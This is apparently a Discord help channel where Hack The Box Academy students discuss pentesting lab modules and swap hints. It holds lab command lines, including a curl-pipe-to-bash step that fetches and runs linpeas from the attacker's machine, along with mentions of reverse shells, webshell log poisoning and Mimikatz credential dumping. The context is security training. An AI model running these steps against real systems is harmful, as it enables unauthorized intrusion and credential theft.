#modules

talk to me private

Just tested for you, works fine for me

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

You can read my link above

@rustic sage Yes, and got: Error: Internal Error, ordering was unable to handle the media swap

Thank you

hello can anyone help me in password attack new skill assessment

Yes, when running sudo apt install dislocker

And it just runs from any directory, like it's on the path?

What do you need help with?

i got some creds and i've trying for DAYS to find something to do with them, so if you can nudge a little in the right direction i'll appreciate it

You can DM.

Guys any help will be much appreciated, iv been stuck on credentials hunting in network shares in password attack module please please please help

I have answered first question but the second one i cant. I found thr second user through rdp using given mendres credentials i cant enumerate the shares and permission with second user but cant find the password for administrato

i'm in the same place, I have the password, but not sure if it changed, plus i don't see any "domain" users....

I have two hints for you,
Hint 1 || use all the tools mentioned on that page of module ||
Hint 2 || Enumerate and read everything in IT share, there is some juicy info that can help, not sure if that is intended ||

please whoever wants to help I will be very grateful

That isn't what this discord is about.

ok

I just tried

Sorry if this is too much

Please read the #rules and follow the instructions in #welcome. This channel isn't for general chit-chat.

can someone help me with the zap fuzzer section please? because I don't know where or I'm supposed to learned to; (use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames)

I've been stuck here since my earlier question

where can I go to learn how to use ZAP to fuzz for different md5 hashed usernames

I am not getting a request with a cookie. everytime I enter the ip in for the URL that this section provides, there are no cookies in the request

so how do I send the proper correct url the is goign to have a cookie in the request so I can fuzz

did you visit ip:port/skills?

Read the question again 😅

The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists. 

/skills/

seriously not trying to be upset because i have been stuck for so long and read this question for 5 hrs

guide through this like i'm 12 because how else am I suppose to read it

go to: <ip>:<port>/skills
find cookie
use rules to fuzz cookie

it's all explained in the section how to do all this

HOW?

Gotta be more specific which part's tripping you up

Do I fuzz the request?

yeap

okay thats what i've been doing

there is no cookie in the request to fuzz

because it had just set the cookie

refresh the page

it sets the cookie in the response not the request

first time you visit: it sees you have no cookie, it gives you one
second time you visit: it sees the cookie

DAMN!

smh feel so stupid

i am able to proceed. thank you for your patience because boy I was over here about to pop a vein

hi all, for module 35 section 223 (web requests, page 4 http headers) what site am i supposed to visit?

the default one when i open up firefox gives me an error

the question says the server will load the flag after the page is loaded, but i dont understand what page - unless its the default, in which case it seems broken for me

There should be a target you can spawn at the bottom of the page.

ahhhh ok it might be silly but i did not expect to have to go to that page

it worked, thanks

anyone down to review my CPTS report example ?

Report Reviews are no longer allowed unfortunately

its for the module documentation & reporting

same answer

bruh

Are you saying we cannot send report of AEN module to someone who has already completed CPTS for review?

Correct

Why though?

@proud pine used to do report reviews they told him to stop

I was hoping I could practice report writing in this module and get feedback on places that required improvement.

@proud pine Did they specify the reason why asked you to stop reviewing report?

They feel like it was a violation of the TOS

I always felt like it wasn't any different than what generally goes on in this channel, but they disagreed.

As long as it's just the module report. There shouldn't be a problem to get help, especially from those that already hold CPTS

That was the idea. A few of us did them, who all had the cert role.

but unfortunately no, they put a full stop to it.

guys need help.. how to use finalrecon.py

i tried everything and no working at all

they are weird sometimes

Can anyone help me in password attacks skill assessment i got into bdavid machine using evilwinrm on jump01 but now i seem to be stuck

Two hint check his privilege and reread the skill assessment text

can i dm u

Yup

😦

sure

hi guys!! anyone who can check the lab for "HTTP Response Splitting" and can make a sanity check wether the admin visit the link because i have the payload working for me and i know how to write the admin cookie without an external server but get nothing back, i tried double and triple encoding, still didnt worked

i can write anything i want through the xss to the log with my own user but nothing with admin user. I even set a cookie for my user and i can via CRLF XSS write it to the log

i tried multiple url encoding

Hey, did you set up pivot? I have no luck with lingolo and chisel from my machine and pwn box also...

ligolo is working on password attacks new skill assessment

Ngl, the secrecy around a lot of the exam really put me off taking it. It feels like even what one would consider basic information about the exam is locked behind ToS so that people will just jump in, fail and buy more vouchers.

anyone can help me regarding this?

Ligoli is working but nmap scan for hosts mentioned in lab description shows:
All 1000 scanned ports on 172.16.119.11 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
All 1000 scanned ports on 172.16.119.13 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

weird my nmap was showing results

Damn mans deleted his message

Hello I am stuck at Brute force Skill Assessment . I completed Part 1 and found out correct user name using hydra . I used the same username on Part 2 and used mdusa for ssh service . Although they are telling ftp user basically it ssh port ( found out by nmap) . I also successfully found out password using mdusa . But can not find correct answer for both questions on part 2 . Please help me

hmm hello guys, can anyone recommend me a beginner roadmap/list to start? i feel so overwhelming

Hello, can I ask a question? The question is, don't you notice that when you stop doing active machines in HTB, the points stop increasing? I mean, you have to do about 3 machines to see the progress.

Installing odat.py

for the people who have issues with oracle tns installing odat:

start a virtual environment:

python3 -m venv venv

source it:

source /venv/bin/activate

then install it with:

#!/bin/bash

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome
pip3 install pyasyncore

and now it should work.

You can run it with source /venv/bin/activate and then run python3 odat.py.
Or you can run it with: ./venv/bin/python3 odat.py

(of course initiate the venv when running)
and if it doesnt work for you, dm me with a screenshot

You are on Ubuntu 24.04

Since you are already heads deep into this, I am a ubuntu user, so here is how I did it to fix some dependency issues:

In case of missing libaio1:

sudo apt-get install libaio1 -y && sudo ln -s /usr/lib/x86_64-linux-gnu/libaio.so.1t64.0.2 /usr/lib/x86_64-linux-gnu/libaio.so.1 && sudo ldconfig

Which would fix the issue of missing libaio1.

@slate zinc pin it plez

Hey, im working on the privilage escalation section in the getting started module (module/77/section/844). I managed to do the first task and move to user2, however, im unsure on how to proceed next. I need root access, but i'm not sure how to get there

i dont get how to run linPEAS on the machine

client_loop: send disconnect: Broken pipe is it supposed todo this on the lpe skills assessment when logging in via ssh it just keeps logging me out?

I am stuck on the windows privilege escalation skill assessment part 1.
I got the revshell on the machine, enumerated privileges, checked common folders, etc. Cant find anything about an ldap admin.
I tried using the juicy potato and stuff but to no avail. I then tried using some CVE to create a new account and even tho i ran it and didnt get an error, i was not able to do anything with it, it never even made the account.
I feel like i spend like 2 hours going down the wrong rabbit hole and havent even gotten to question 2 yet.

i've tried hosting it on a http server but i cant get a connection to it from the remote host

I need help with Credential Hunting in Network Shares for both questions. I am so lost, i have tried running both Snaffler.exe and Powerhuntshares but to no avail.

There are a shit load of different ways to transfer files between machines. Go to the File Transfers module and use methods in there. Remember to chmod +x linpeas when you run it with ./linpeas.sh

you can, smb, copy paste into nano, http server, scp, ftp, etc.

I see, thanks. I’ll have a look again later 👍🏻

You can DM if you're still stuck.

Hey, tried this and managed to get the script on the remote host. I get the error "temporary failure in name resolution" when i try to run it though

hey guys, if anyone can help me with the logrotten section of linux priv esc module it would be appreciated. I've tried having the payload do a reverse shell and move the file im trying to read, but both arent getting executed, even though its telling me its writing the payload. thanks

omg nvm literally ran it once more and worked

its like a 1 in 20 chance

apparently so

sorry to ping you, but would you be able to point me in the right direction in my task? im doing the Privilege Escalation section in the getting started module, but i keep having issues with linpeas

don't use linpeas then?

what else am i supposed to use?

nvm ill try linEnum

enumerate

normally

Kek

on what are you stuck?

I got you now lol

Thank you anyways

?

the module wants me to use a script... which wont work

the hint is "dont forget to chmod"

I can know what are u doing

chmod +x script.sh

ive done it already, i get the error "temporary failure in name resolution"

Be more specific?

when trying to run the linpeas script

check your vpn

oh wait

you are running linpeas.sh? And how are you running it?

Are you trying to directly execute linpeash with a oneliner, instead of transferring the script to the machine?

are you running it remote?
Like for example curl yourip:port/linpeas.sh | bash?

i used wget -o

then the github site

yea thats the issue

the box does not have internet access

you have to download it to your own machine, and then transfer it from the machine to the box

how? i tried hosting it with pyhton3 -m http.server

but i couldnt get a connection

ill give you some commands

thanks :)

on your machine

get the linpeas.sh

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh

Now transfer it:

cd /tmp && python3 -m http.server 1337

on the target machine

curl -s http://yourip:1337/linpeas.sh | bash

there you go, that should run it

thanks, ill give it a try. i've gotta use the tun0 ip, right?

yes

but this is common sense, so if you don't understand this yet, i'd recommend diving deeper into the basics of linux

it didnt work, i didnt get any output at all.

maybe theres some configuration with my firewall that messes things up?

mind sending screenshots and/or command output?

sure, no problem.

hold on a sec

it didnt give any output at all, i also tried just running curl http://ip:port and the same thing there

first of all i'd recommend using a VM, to prevent breaking your system after some time installing tools

The target cannot reach you, you are attempting to download a file using the IP address of the VPN, whereas the target doesn't know and is not associated with it. The target is a docker container.

yea you should look at your interfaces again, the docker should have its own interface (if you are running this container locally)

i usually do, i installed this system a while ago just to see how linux was, and tried to do some of the tasks on here since i could

The docker container is not configured in a way that allows you to download files over the internet

finally.... i just copy pasted the script and used vim

also very possible 😛

but when in a reverseshell, its not really easy to execute something like vim or nano

since it would not render good

what are those errors?I m a step ahead of you, installed all the necessaries to mount the vhd file , but I do not have the password to decrypt it with dislocker cmd. Do you have the password to unzip the "*.zip" file from the previous question?

Hello Evan, i m trying to mount the vhd file, but I don t have the password from the previous question to decrypt it(i had already solve the first question before the modifications to this module applied 5 days ago more or less, and probably mine is outdated or not correct). Can you gave it to me please via dm?

running into issues with it again, so ill try to fix it. otherwise i'll ask to remove the pin 😄. FIXED IT

hey, i am currently on module FILE UPLOAD ATTACKS, blacklists filters.

I am trying to use ffuf and not burpsuite to fuzz for the extension but im failing, i finished the exercise with burp.
Someone who did it using ffuf and can help with me the command and the file request ? i am seeking to solve it using ffuf ^^

i finally did it, thanks for the help. I found out i could just copy the private ssh key and log into root user with it

"I've been stuck in a cloud of confusion for over six months now, and it's eating away at me. Deep down, I know cybersecurity is what I want—it's what excites me, drives my curiosity, and gives me a sense of purpose. I want to become an ethical hacker. I’ve built up some knowledge of networking and tools, and I’ve even explored platforms like Kali Linux, Metasploit, Burp Suite, and Wireshark.

But the truth is… I feel lost.

Some days, I dive into bug bounty hunting, but I don’t understand what’s really going on—and I end up quitting. Other days, I jump into using tools like Metasploit or Burp Suite without even knowing why I’m using them. And then there are days when I go back to square one, starting with the basics all over again.

It’s like I’m running in circles, overwhelmed and directionless.

I don’t need more random videos or tools—I need a clear path, a step-by-step guide, a mentor to help me connect the dots. I want to stop wasting time and finally take control of my journey in ethical hacking. I know I’m passionate. I know I’m capable. I just need the right structure, support, and a solid roadmap to follow.

Please help me find that path

Do you resolve it?

the two file ccache are expired to 2022

I would have to see a screenshot of what you are doing.

I figured it out, thanks anyway :)

Damn 👀

i am getting in the response Extension not allowed/ Only images are allowed

Hi I am doing the SQLmap Essentials Skills Assessment challenge on hackthebox academy I am struggling to even find the right page to do the sql injection I checked all the pages and the forms to look for a post request to inject and I have also checked the burpsutie history for post request any tips?

These are both expected answers, the reading tells you about the difference between the two

Same here. Are you able to grab the flag?

What the Time Means (e.g., “2 hours”, “3 days”) ?!

Estimated time the module will take to complete?

I'm facing the same issue. Got flag?

ah! thanks

1 day = 8 hours
the time is a general estimate if you have 0 issues at all with the content and don't take your time reading and taking notes

thanks ! 👍

Hi,
I'm stuck on Introduction to Windows Evasion Techniques->Static Analysis, ThreatCheck print No threat found!, the log file in the VM say me

[06/09/2025 08:10:32] Checking...
[06/09/2025 08:10:32] C:\Alpha\Static\notMalware.exe - OK - Undetected by Microsoft Defender Antivirus

but the flag never appears.

Does anyone have any idea how to debug the problem ?

Make sure you follow the instructions precisely. The two things I notice people miss a lot is the type of program (C# .net console) and using debug version instead of release.

Hello! I am trying to set up Proxmox for the first time. When I enter the address it gave me it is timing out so I can not get into the web dashboard to complete the setup. Any suggestions?

Enumerate; have you clicked on everything?

Hi. I'm doing the Linux Privilege Escalation Skills Assassment and I'm having trouble with the machine... It randomly disconnects and when trying to log in again it fails several times until I can log in as htb-student. Is this part of the assignment? Already tried with reset

try changing vpn regions

currently EU vpn targets seems a bit loverloaded

This was us-1. Changed to us-4 and it's slow but working

client_loop: send disconnect: Broken pipe
anyone had this error when logging in via ssh keeps logging me out with this error

yup try to ping the box you will see 1000+ ms from time to time

same exercise not working for me also bro

the box pings fine

bc i had the broken pipe error due to lag

tried changing vpn regions still the same

Hey guys i have got a ISh Alpine

And it says localhost server

What means?

NTLM Relay Attacks Skills Assessment
Hi guys! Currently working on skill assessment here and got stuck on the question 4 for few days. Can I have a nudge? So far I understand it is something related to Farming Hashes even I have the sqlftp credential from question 3.

I'd look at what your currently harvested creds have access to and how you can use them with a service to relay hashes.

Hmm, I think I get what you mean, let me check back backup01 host, thanks!

If you still don't get anywhere you can DM.

Now the same is happening for us4, us2, us1... Have you found a region where it works?

hi

i am new to this server

i just got to know about hacker box

can one give me a run throug or a guid to how to start doing ctf n all

lmao

No i havnt

Welcome to the server. I suggest reading #welcome and checking out the #rules

Hello guys ! can I have an explanation of this question : How many incoming explicit object controllers exist in the Domain Users group? (It's from Bloodhound module, Analyzing BloodHound Data section)

so look up the info in your bloodhound? it's not a fixed number it depends of your data

"explicit object controllers " is one of the info you can get from the interface pretty easily "no need to make custom queries"

Is there anyone here who can teach me ethical hacking?

you know htb academy platform is made for that right

@quaint cliff I don't know

.

so this channel is for : https://academy.hackthebox.com/ , which is a platfrom with courses modules, you can get a few starting modules for free, then you can either pay for module or take a monthly sybscrption to access the other modules

Would it be better to get a degree in computer science or cybersecurity?

If I want to work to security/ pentesting in the future?

read and follow #welcome and ask in #careers-and-certs

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@summer bronze ^

Anyone have tips for the Password Attacks - Credential Hunting in Network Shares module?

I've located the first set of credentials, answered the first question & am using the second account. I found a credential in one of the shares that the second user has access to that I thought was the answer to the 2nd question ... but it won't accept it as the answer so I guess not. I've run Snaffler as both users, PowerHuntShares & manual searches with the Powershell command shown in the module (various patterns related to credentials)

If someone could nudge me in the right direction I'd appreciate it

hey people, need a hint or help any kind on module Pasasword Attack section Pass the Certificate, i dont know what am i doing wrong, im following steps and cant get ./DC01$.pfx cause connection goes down.

guys i stuck on Windows Privs Esc Skills Assessment Part1 when i try to download JuicyPotato on the Target VM and then try to execute it i get an error telling me "This version of C:\Users\Public\jp.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher." Why only me getting this error ?
even if i try other executable from other sources i get same issue, also tried to build the exe myself (same result and error)

i was about to ask the exact same thing, i would also appreciate a nudge

Can't capture the Beacon Message, where you can find at EAPOL. Wi-Fi Penetration Testing Basics - Skills Assessment

dm me

I'm still having the same issue... Already tried with: us-4, us-1, us-6, us-3, eu-3 and the problem is the same

manspider

Hello everyone! I am on the "Attacking Web Applications with Ffuf" module, on "Skills Assessment". I am stuck on third question saying "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?". I found the page but when I try to submit the answer it says "Wrong answer". I have tried submiting the full url (+port), url without port, url without port and without "http" in front and nothing seems to work. Does anyone have any suggestions?

anyone?

Hi, i have a question can anyone help to track someone bc someone create fake acc on ig with my photo and i want to know who is that

Hello, the host in exercise Attacking Windows Credential Manager is unstable as hell, is there any issue here ?

Thx

Have you tried nxc or manspider from the section?

If you are having a connection issue, it is usually suggested to switch up your connection, either by downloading a different VPN config file, switching the VPN region, disconnecting from VPN and trying it from pwnbox, etc.

Where did you get your version of JuicyPotato? I believe the section provides a link to the Git repo.

Solved it now. I hadn't been as thorough as I thought with searching the shares. Thanks for the tip.

Cool deal, great job!

mmmm kind... nmap is scanning good both ip. but the problem is impacket-ntlmrelayx and printerbug.py are not working for me and want to know if im doing something wrong. im just following step by step lesson

Ok, if you'd like you can DM your output from ntlmrelayx and printerbug

thanks a lot. will do

don't remember that module off the top of my head but is there a hostname you should've added to /etc/hosts?

that might be it

Thanks for the tip! Turns out that I did not read the hint correctly. I needed to replace the port in the url with the word PORT. In the end, it was easier than expected

no one can help you with that

this is for PenTesting, has nothing to do with ig accounts

NO

Lol

anyone did the new LLM Output Attacks module

have a question

Hello, I know a little bit about networks and I really want to start learning cybersecurity and I don't really know what I need to learn to know and apply this field in vulnerabilities and defenses and I would be happy if I need to learn for this field.
In the field of pentesting, ethical hacker in and red teaming cybersecurity

I would love tips on how to start learning.

start from the beginning modules like learning process and so on and get deeper into the hacking world

thanks

you know when you gain new knowledge understand how things are going you will be discovering new things to learn and get deeper into the theme and you will understand yourself what you need to study what you want to study))

true you are right

Hey Guys, I am doing password attacks I am stuck at the new section: Atcking Wndws Crentl Manager One I have bypassed UAC but still even after system32 I get privalage error in mimikatz

I am able to log into mcharles and sadams with system32 but yea still get mimikatz error

And also runing dpapi keys with mimikatz srill it crashes

This is not the channel or server for that.

It just crashs

hey, sup? am I the only one not managing to connect to tombwatcher.htb via targetedKerberoast cuz "invalid credentials"?

This should be asked in #1380967904429871275

Hey anyone here can help with XSS module?

Session hijacking to be exact

Im confused about how to test a payload in each field. Am I supposed to have a listener running in my vm attack box?

Try using a different tool and method

Yes

You test each field to call back to your machine

y cant i message in general?

Follow #welcome instructions

oh thx

use python -m http.server port

Hey, currently doing the Attacking Windows Credential Manager section in the Password Attacks module, I have found the needed password using lazagne but was hoping someone could help me do it using mimikatz with UAC bypass

I mean its just the same thing but with mimikatz in an admin terminal using UAC bypass

Hey

Hello. Did anyone finished the "crackmapexec" module? i would have a few question on the skill assessment

I can't get past the IDS/IPS Evasion Firewall module. I've run everything on nmap and it always shows as filtered.

I tried this and more

dangg it is mimikatz?

um wait this error?

Try checking service version

I did with -sV

Don't see that in either of your images

But always filtered

Reset target and try again? Maybe your earlier scans tripped the ids/ips

I did it

Is it an error in the module?

I have no access, as it seems, but thanks anyways

Read and follow #welcome to gain access

idk if I'm dumb or there's a bug. I am doing Linux Fundamentals and stuck on the question:

"Which kernel release is installed on the system? (Format: 1.22.3).
which I ran uname -a got 6.11.5 but tried every variant 6.11, 6.11.0, etc. even 6.11.5-1parrot1.
&
"What is the name of the network interface that MTU is set to 1500?"
which I ran ip link got ens3 & tun0 both were wrong even tried different variants like enp0s3 but none of them work. So idk if my work station is outdated or the questions/answers are or what's going on. Any knowers?

Are you ssh'd into the target?

I believe so that's the "Target(s): right?

yeah

yes I have my target, am I supposed to plug it into the workstation myself? I was under the impression you click it then open the station and it should be setup

You need to ssh into the target

ssh <target-username>@<target-ip> then put in the password that you're given

If you're using a personal VM you'd have to be connected to OpenVPN

thanks let me check

Hello

I never read welcome, lol (damn tdah)

Just started working through CPTS, reading about CT logs in the subdomain enumeration section. I'm pretty sure I'm misreading this - it looks like there's a public record of every subdomain? isn't this just significantly stronger than brute forcing the subdomain enumeration?
I must be missing something but I don't see what. There's no way that looking at Censys or cert.sh is just better than using gobuster / ffuf / etc

No, they don't hold public records for all subdomains. One example is you can have a wildcard *.domain cert that covers any subdomains you have. It doesn't list each individual sub domains.

Gotcha that makes sense, I was like this seems insane to have out in the open

ya so anytime I do the ssh htb-student@IP Address then it asks for the password in grey and doesn't let me type the password. I use the pwng box I even tried doing the IP number it gave me and just posting it in the web browser but that's doesn't work either

I use windows on this pc and don't use a VPN, so should I not rely on the pwnbox?

I figured I was going to have to do this. The reason I am learning the Linux Fun. is so I can download Linux Arch on this thinkpad I bought to do all that stuff lol

wompwomp lmfao so I guess for this thinkpad I'll do that then buy a different one in the future to download arch

Yeaa

Lemme try the italin dish

and every time i do it ca01 ip's goes down

please don't share module info like passwords and such

Hello everyone I’m severely new to all this
Including using discord
I’m currently going through the recommended start path Information Security Foundations
Trying to set up the VM with virtualbox and proxmox but i have been unsuccessful so far getting prox to open in the box. Any help with this would be greatly appreciated as well as any tips on if im starting my cybersecurity journey correctly and what i should be learning or studying

you don't need to set up proxmox

the setting up module is more of a rough guide than a pure tutorial

Lol ok thanks I’ll continue on then

hey people, someone can help me trying to fix oscrypto from PtC and its not working

Hello everyone, I am stuck in password attacks ( https://academy.hackthebox.com/module/147/section/1391 ). can anyone help me pls?

from the git repo or by compiling it or even by copying the version in the lab section, all of them get same error on skills assessment part 1

https://academy.hackthebox.com/module/18/section/80

how to get through this one guys

Make sure you have SSH'ed into the target

Good Morning together, I need help with the "Fundamental Linux" module. I hope I'm right here!
I can't connect via SSH to the Docker Container and I really dont get the problem. I wanted to do an annual subscription and test some basic stuffs before. Thats the output:

└─$ ping 10.***
PING 10.1*** (10.129.170.232) 56(84) bytes of data.
64 bytes from ***: icmp_seq=1 ttl=63 time=54.7 ms
64 bytes from *** icmp_seq=2 ttl=63 time=37.8 ms
64 bytes from ****: icmp_seq=3 ttl=63 time=49.0 ms
^C
--- **** ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 37.802/47.168/54.656/7.007 ms
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ nmap 10.***           
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 03:59 EDT
Nmap scan report for 10.129.170.232
Host is up (0.037s latency).
Not shown: 991 closed tcp ports (reset)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s

Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ ssh htb-student@10.1****2
^C
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ ssh htb-student@10***32 -p 22
^C
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ nc 10.1****2 22           
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
^C
     ```

Can you please mention the section and the question? From your output it seems ssh is responsive.

....

File Descriptors and Redirections - Question: How many files exist on the system that have the ".log" file extension?

Side note: Labs are working for me

Hmm interesting I tried and I can connect to SSH just fine.

I would suggest try connecting to ssh server through the pwn box. I suspect something might be wrong with your ssh client.

And I assume you have tried to restart the target if you haven't do try the classic turn it off and on again.

I tried this. But it also doesn't works. I also tried different VPN connection files... But it seems it must be a problem on my side, so I'll go for troubleshooting. Thank you very much 🙂

You tried using the pwn box and it didn't work?

Pwn box worked, but it feels different and was a little bit slow yesterday. maybe due high traffic in the evening

Oh yeah that's another issue, but as you mentioned the issue is on your end. So most likely some mess up with your ssh client.

You can also ssh into the pwn box if GUI feels slow and you need/want to use the pwn box.

Ok, I’ll take a look after it. Thank you very much 🙂

Good luck!

Try and adjust your tun interface MTU

Hi guys! Are there any modules on ROS2 security or anything similar?

LPE skills assessment is still broken for me how can i raise this issue?

what do you mean by broken? @sick depot

I did the module a few days ago, didn't have any issues

When i ssh in it logs me out straight away saying broken pipe

What vpn type are you on and on which region?

are you using pwnbox or your own vm?

works fine here on pwnbox

Hello! Im doing the module documentation and reporting, and got curious about the tools to report mentioned

I mostly use ms word or markdown

does anyone use another one, and like it?

a lot of people use SysReptor

Ive tried numerous different one have you tried doing a few commands for a minute or 2 it will then log u out

Maybe its best to contact support

Hi, might be the wrong channel but still gonna ask, anyone had issues with the flag in the NMAP Enumeration, Scripting Engine section?

my instance is still working and I just got flag 1

what sort of issues?

In short, i got the flag using -A -T4, but the flag is invalid.

Please dont post the flag publicly

dm the screenshot to me and I will check

Alright. Didnt think much about the flag in public

Which module do you need this for? Normally links are included in the modules if necessary

Hello, I'm taking the Password Attacks course and I'm in the section on attacking Windows credentials using Mimikatz. The problem is that I don't know where you run it, since the Windows Server machine doesn't have internet, I can't become and administrator because I don't have a password, and I don't know what to do.

I can login With mcharles

But I dont know where I need to execute mimikatz.

Everything is taught in the section

No administrator access is needed 🙂

The example in the Section is With the User administrator

Not all the questions are solved by copy/pasting the section's content

Yea, I know, but i dont know what I need to do

There's other tools mentioned

So, I dont need to use mimikatz

@storm elk best way to contact support?

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

there's an email at the bottom - or via the live chat

i also stuck. did any moderator can assist you?

Good morning everyone, I need help on the File Upload Attacks module, the Whitelist section. I have not been able to get a web shell, but I have tried everything the module suggests. I even tried to upload the web shell with every allowed extension. But it doesn't work and I don't know what I'm doing wrong.

ayyy yooo

hello @everyone

i send you mp

that wont work

😉 also hello

I'm doing the Skills assessment for the WiFi Evil Twin Attacks and I'm confused on my last question. I have 2 of the 3 answers, but any attack I have tried so far I am not getting anywhere. I've tried the manual Evil Twin attack but apache isn't installed and I can't install it. The Karma and Mana attacks kinda seem to work but nothing gets written to a .hccapx file for me to convert it. It's a PSK Network, the only automated tool I have on this box is WifiPhisher and eaphammer, but neither taught about using against this type of network in the course.

I know I'm missing something, so please just give me a hint to help me out . If someone could point me in the right direction, that would be very helpful.

There is a "Hint" button on the right side of the question which would provide you a hint to solve the question.

I've looked at that, it says interception, but there's a few ways of intercepting it that were taught in this section and I've tried them but I feel like I am missing something as I get no results.

What section has that word in it?

If you follow the section you should get the flag.

SSL Interception, which I have been using with Ettercap but nothing shows up. I do get a host in there but when I begin the SSL Intercept and the ARP poisoning, nothing comes back.

But I will try again. Thank you

You need to make sure all clients are being connected to your rogue AP

If you want, you can DM what you have going on.

Hey guys I am working on the getting started module trying to solve the nibbles box. I haven't been able to look up the target ip. I have tried everything i could think of and used any information i could find. I am very new to this world and not very educated yet. Any tips would be very helpful. Thank you!

I need some help on Password Attacks section Credential Hunting in Network Shares
i tryna run the command like the instruction for PowerHuntShares but didn't work

Did you import it before trying to run the command provided in the section?

like this right?

Read the error and if you are unfamiliar with it, some Internet research should help you get around it.

and btw do u know what shares the first question is talking about? I have tried all 3 shares i can access to but nothing seems suitable

why is the academy VPN so slowwwwww

I did the entire lab using netexec. They have a great wiki if you are unfamiliar with it. It is briefly touched on in the section.

i bet someone is mining monero on academy machines

Apparently the spawns are down?

Nvm just spawned lol

can someone give me a hint for question 2

I tried every files on the shares but cant find nothing but dummy credentials

There are keywords in the question.

i tried logon to the user i found

You can DM and we can chat about what you are trying/tried.

then recheck the shares folder i dont have permission from the previous user

Hey, a quick question: is there some specific rules when we submit an answer during a module's question ? I am sure of my answer (double check done on my side) but... not working... so, I really don't understand

If copying a flag, I would verify there aren't any leading and trailing spaces getting pasted with the flag.

Now, it's just a simple question:

And the answer is very easy (As said, I crossed check) but... Apparently not working

However, I am 100% sure of the answer

Can I submit the question here without precision of the module?

Good Afternoon guys

i need little help with the module AI

No I would not do that, but you can post the module/section and if I've done it, I can verify it for you. If I haven't done it, perhaps someone else can verify it for you.

Everything is mentioned in the module page, there are two techniques. If you want a more through understanding and alternative approach, give this link a read.
https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets

YARA & Sigma for SOC Analysts
Page 5
Hunting Evil with YARA (Linux Edition)

Can someone help me with this problem? I am for some reason not understanding what processes I am looking for when I do the yarascan.

ey, hello, i alredy complete this module. but thanks you so much

Hello, hope you all have been well.

I'm reviewing File Inclusions today, and I am having an issue on "Server Log Poisoning,
I'm attempting to poision /var/log/apache2/access.log via BurpSuite

• Changed User Header to a PHP Webshell >> Send

It seems i'm either destroying or breaking the log file every time, not able to get the results shown.
(500 Internal Server Error)
Anyone got an idea what I could be doing wrong?

(Image deleted to redact IP)

hey guys i struggle with the module footprinting -> smb
i dont understnad what they want from me in this question:
"What version of the SMB server is running on the target system? Submit the entire banner as the answer."

I can answer the other questions but i cant that one?
what is the "entire banner"?
I see like 3 different versions
nmap scans - 2-3 different ones on here
and there is a version on comment on smbshare
like im so confused??

nmap shows versions:
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2

fingerprint-strings:
| GenericLines:
| 220 InFreight FTP v1.1
| Invalid command: try being more creative
| Invalid command: try being more creative
| NULL:
|_ 220 InFreight FTP v1.1

and on comment i see
sambashare READ ONLY InFreight SMB v3.1
[6:55 PM]
there were some modules with similar questions and i feel like i just am able to answer them with luck sometimes bcs that example above happens to me more often now where i see different versions and i dont know what they want when they ask for entire banner i feel lost. would really appreciate some help

I think they want X.X.X as your answer

nmap -sV --script=banner <target>

Or you can also do it manually
nc $ip 445

Banner is usually first line that a service respond with when initiating connection, It contain service name and version.

Since you already have the answer, this might explain better.

PORT    STATE SERVICE  |   VERSION
139/tcp open  netbios-ssn | Samba smbd 4.6.2
445/tcp open  netbios-ssn | Samba smbd 4.6.2

@plain spruce

The question is asking for you to grab the entire banner of the "VERSION"

So copy everything after the PIPE ( | )

tried both of your approaches @vernal tapir @faint hamlet doesnt accept it.
i tried:
139/tcp open netbios-ssn Samba smbd 4.6.2
netbios-ssn Samba smbd 4.6.2

nvm this worked: Samba smbd 4.6.2
..

lol

R E A D

in my head the entire time
"139/tcp open netbios-ssn Samba smbd 4.6.2"
this is the entire banner.
not just "Samba smbd 4.6.2".

Did you already do Linux Fundamentals?

i did. and it says:
What version of the SMB server is running on the target system? Submit the entire banner as the answer.
"SUBMIT THE ENTIRE BANNER"

If not, highly recommend you do that

Yep, I know it's a little misleading for someone starting out, just to let you know majority of the questions are similar to that, requiring you to fully understand and read the questions. We all struggled through it at least once lol

i didnt, because i dont think i need it. i have a some experience on linux. the questions is just worded dumb imo.

That's nothing

You're gonna have fun trust me 😄

